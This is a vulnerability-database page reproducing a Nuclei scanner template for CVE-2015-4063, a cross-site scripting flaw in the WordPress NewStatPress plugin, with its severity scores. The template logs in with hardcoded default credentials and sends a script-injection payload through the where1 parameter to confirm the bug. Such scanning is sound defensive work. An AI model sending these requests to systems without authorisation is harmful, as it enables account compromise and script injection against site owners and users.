Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-4063
HistoryMar 05, 2023 - 1:42 p.m.

NewStatPress <0.9.9 - Cross-Site Scripting

2023-03-0513:42:10
ProjectDiscovery
github.com
1
cve2015
xss
wordpress
wp-plugin
newstatpress
packetstorm_project
web
security
remote
exploit

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

5.3 Medium

AI Score

Confidence

High

0.04 Low

EPSS

Percentile

92.1%

WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.
id: CVE-2015-4063

info:
  name: NewStatPress <0.9.9 - Cross-Site Scripting
  author: r3Y3r53
  severity: low
  description: |
    WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: Update to plugin version 0.9.9 or latest.
  reference:
    - https://packetstormsecurity.com/files/132038/
    - https://wordpress.org/plugins/newstatpress/
    - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4063
    - https://wordpress.org/plugins/newstatpress/changelog/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:N/I:P/A:N
    cvss-score: 3.5
    cve-id: CVE-2015-4063
    cwe-id: CWE-79
    epss-score: 0.04016
    epss-percentile: 0.92055
    cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: newstatpress_project
    product: newstatpress
    framework: wordpress
  tags: cve2015,cve,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log=admin&pwd=admin123&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - "contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"
        condition: and
# digest: 4a0a0047304502204dcfbadcca5be302e9005c92913b307c97309c8e974acf2bdb99f4df9740f6ff022100802868c4ad97fb42dfac7d60809e03080f19074c6cba1131c3bd4e5da034414c:922c64590222798bb761d5b6d8e72950

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

5.3 Medium

AI Score

Confidence

High

0.04 Low

EPSS

Percentile

92.1%